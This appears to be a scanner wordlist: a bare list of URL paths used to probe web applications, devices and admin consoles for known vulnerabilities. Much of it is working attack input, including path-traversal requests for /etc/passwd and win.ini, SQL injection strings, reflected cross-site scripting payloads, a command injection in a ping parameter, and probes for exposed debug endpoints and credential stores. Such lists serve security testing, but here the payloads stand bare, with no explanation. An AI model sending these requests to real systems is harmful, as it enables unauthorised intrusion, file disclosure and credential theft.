/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true
/wp-admin/tools.php?content=&wp-attachment-export-download=true
/command/prima-factory.cgi
/fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini
/fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini
/verify.php?id=1&confirm_hash=
/mantis/verify.php?id=1&confirm_hash=
/mantisBT/verify.php?id=1&confirm_hash=
/mantisbt-2.3.0/verify.php?id=1&confirm_hash=
/bugs/verify.php?confirm_hash=&id=1
/debug/pprof/
/debug/pprof/goroutine?debug=1
/WealthT24/GetImage?docDownloadPath=/etc/passwd
/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini
/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/var/www/html/wordpress/wp-content/index.php
/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/var/www/html/wp-content/index.php
/files/ldap.debug.txt
/?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image
/file?valore=../../../../../windows/win.ini
/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout
/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)
/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd
/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd
/components/statestore
/overview
/controlplane
/public/ticket/ajax/ajax.php?action=getContacts&email=%

/../../../../etc/passwd
/lang/log/httpd.log
/index.php?rest_route=/wp/v2/pages&per_page=100
/?page_id={{search_page_id}}&type=tf_hotel&place=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&adults=2&children=1&room=1
/api/setup-complete
/download_work_dir_file?path=/etc/passwd
/inc/data/database.sdb
/cgi-bin/dynamic/config/secure/security.html
/admin/
/_config
/nifi-api/access/config
/api/security/ticket
/?query=SHOW%20DATABASES
/__clockwork/latest
/_status/nodes
/druid/index.html
/api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_%2f%2e%2e%2fweaver%2eproperties
/v2/auth/roles
/i/?a=logs
/users/sign_in
/api/search?type=dash-db
/api/dashboards/home
/dashboard
/api/org
/api/users
/api/datasources
/api/frontend/settings
/SSI/Auth/ip_snmp.htm
/hp/device/webAccess/index.htm?content=security
/UI/Dashboard
/jackett/UI/Dashboard
/jmx-console/HtmlAdaptor?action=displayMBeans
/pipeline/apis/v1beta1/runs?page_size=5&sort_by=created_at%20desc
/v2/keys/
/ADSearch.cc?methodToCall=search
/mem_tracker
/ajax-api/2.0/preview/mlflow/experiments/get?experiment_id=0
/config/pw_left_bar.html
/applications.pinpoint
/config
/api/v1/status/config
/#!/printer/Prusa_I3/print
/Portal0000.htm
/solr/admin/
/api/me
/home
/ckfinder/ckfinder.html
/#/devices
/upgrade.php
/settings/general
/collections
/favicon.ico
/api/v1/namespaces/default/workflows?query=
/wifi_base.shtml
/#/alerts
/backend/admin/users?username=anonymous
/Default.aspx
/mongo-express/
/db/admin/system.users
/sensorlist.htm
/data/plugins_listing
/config.json
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
/cgi-bin/cgibox?.cab
/cgi-bin/cgibox?/nobody
/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method={{randbase(6)}}
/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd
/ccm/system/panels/page/preview_as_user/preview?cID=
/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=%27
/RST_status.htm%00currentsetting.htm
/plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user
/api/v1/userlist?pageindex=0&pagesize=10
/fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails
/dgn/dgn_tools/ping.php?ipdm=2;id;
/lucee/admin/web.cfm
/lucee/admin/server.cfm
/lucees3ezf%3cimg%20src%3da%20onerror%3dalert(
/lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert(
/pub/bscw.cgi/30?op=theme&style_name=../../../../../../../../etc/passwd
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
/index.php?page=/etc/passwd
/hoteldruid/inizio.php
/inizio.php
/UserSelect/
/wp-content/plugins/blogroll-fun/blogroll.php?k=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/api/v1/collections?tenant=default_tenant&database=default_database
/api/v2/tenants/default_tenant/databases/default_database/collections
/
/api/auth/settings
/admin
/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--
/api/raster/search/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--
